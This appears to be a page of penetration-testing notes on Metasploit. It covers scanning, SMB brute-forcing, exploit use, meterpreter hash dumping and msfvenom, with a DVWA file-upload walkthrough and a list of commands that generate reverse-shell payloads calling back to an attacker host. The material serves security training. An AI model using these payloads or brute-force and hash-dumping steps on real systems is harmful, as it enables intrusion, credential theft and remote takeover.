Metasploit

Tool for scanning, vulnerability assessment and exploitation

Command to start: msfconsole

Scanning

TCP

Metasploit has a number of modules to scan open ports on the target system. Use the command search portscan to list potential port scanning modules. The following are common modules to use:

  1. portscan/tcp: TCP Port Scanner

  2. portscan/syn: TCP SYN Port Scanner

  3. portscan/ack: TCP ACK Firewall Scanner

It's also possible to perform nmap scans directly from the metasploit console.

UDP

The scanner/discovery/udp_sweep module allows to quickly identify services running over the UDP (User Datagram Protocol). Although the scan does not conduct an extensive scan of all possible UDP services, it does provide a quick way to identify services such as DNS or NetBIOS.

SMB

The smb_enumshares and smb_version modules are useful in a corporate network and help enumerate smb services.

Use the smb_login module to brute force known usernames with a password list. Warning: This can be very slow, so only use if there's evidence

Metasploit Database

To organize target information within an engagement, the metasploit database can be used by setting up a PostgreSQL database.

  1. Start PostgreSQL: systemctl start postgresql

  2. Initialize the metasploit database: msfdb init

  3. Start metasploit: msfconsole

  4. Check databsase status: db_status

  5. Add workspace: workspace -a $WORKSPACE

Once the database is setup, db_nmap can be used to save nmap scan results. The commands hosts and services can be used to show information relevant to hosts and services on a target system.

Exploitation

Search for exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit or run. The success of a kill chain heavily relies on a thorough understanding of services running on the target system.

Use show payloads and set payload to choose a useful payload if a preset default in not present. This could often be a trial and error process due to environmental or OS restrictions. Use show options command to show parameters that can be customized. Common parameters include:

  • RHOSTS: Target system(s)

  • RPORT: Target port

  • LHOST: Listening Host

  • LPORT: Listening Port

  • PAYLOAD: The payload to execute i.e. shell, stager, rce

You can background a session using CTRL+Z or abort using CTRL+C. This is very helpful when working on more than one target simultaneously.

The sessions command will list active commands while the -i tag can choose one of the listed sessions to interact with.

Once in a shell, the shell can sometimes be upgraded to a meterpreter session using the command sessions -u $ID which can be very helpful for managing pivots and post exploitation methodologies. Two very useful commands include search and hashdump which allow for file searching and NTLM hash dumping.

MSFvenom

Msfvenom is the metasploit tool used to generate payloads. It can access the payload library and allows full customization of a payload including format, architecture, target system, and bad characters.

Output formats can be viewed using the msfvenom --list command. Encoders cna be specified with the -e parameter. The following is an example of a command utilizing msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=$IP -f raw -e php/base64

Handlers

This is one of the most useful parts of metasploit. Within the metasploit framework, this part is automatically handled by an exploit module. Handlers are designed to catch a shell that is coming from a target back to the attacker machine.

The following scenario follows exploiting the file upload vulnerability present in DVWA (Damn Vulnerable Web Application):

  1. Generate the PHP shell using MSFvenom (this will need to be modified post generation to add php start and end tags): msfvenom -p php/reverse_php LHOST=$IP LPORT=1337 -f raw > reverse_shell.php

  2. Start the metasploit handler: msfconsole; use exploit/multi/handler; set LHOST $IP; set LPORT 1337; run

  3. Execute the PHP shell

COMMON EXAMPLES:

  • Linux Executable (32) and Linkable Format: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f elf > rev_shell.elf

  • Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f exe > rev_shell.exe

  • PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=$IP LPORT=1337 -f raw > rev_shell.php

  • ASP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f asp > rev_shell.asp

  • Python: msfvenom -p cmd/unix/reverse_python LHOST=$IP LPORT=1337 -f raw > rev_shell.py

All of these example are reverse payloads and work with the exploit/multi/handler module.

PreviousUpgrading ShellsNextMeterpreter

Last updated